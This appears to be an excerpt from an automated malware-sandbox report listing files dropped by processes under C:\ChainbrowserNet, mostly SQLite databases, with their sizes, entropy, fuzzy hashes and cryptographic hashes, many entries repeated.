                                                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5707520969659783
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                          Category:dropped
                                                                                          Size (bytes):28672
                                                                                          Entropy (8bit):2.5793180405395284
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5707520969659783
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):49152
                                                                                          Entropy (8bit):0.8180424350137764
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5712781801655107
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\serverDll.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):25
                                                                                          Entropy (8bit):4.133660689688185
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:QoA/2dlx:Qz/6f
                                                                                          MD5:9EFF8350D868F9C0120ACC8912772A85
                                                                                          SHA1:FBAB2AEB0EEF87AC20FA2980061A5D9D808DCE0E
                                                                                          SHA-256:373CF8E3F4AD5CCA89BA0340220F9F84344D74DEE24507B1708F63A0532E0132
                                                                                          SHA-512:2C1009C07D4208270C0E2B2B5C3574B403DEB1093FA1024247A31B8DEF496CA43C319B9DFAB0B7384D3D78675BA350F9D89D47693166E42EF5E3C6445FF0EDB6
                                                                                          Malicious:false
                                                                                          Preview:rNA0KBNqZ3e3xILAkorqQFNMY
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):49152
                                                                                          Entropy (8bit):0.8180424350137764
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5707520969659783
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):49152
                                                                                          Entropy (8bit):0.8180424350137764
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5707520969659783
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):49152
                                                                                          Entropy (8bit):0.8180424350137764
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):49152
                                                                                          Entropy (8bit):0.8180424350137764
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5707520969659783
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                          Category:dropped
                                                                                          Size (bytes):28672
                                                                                          Entropy (8bit):2.5793180405395284
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
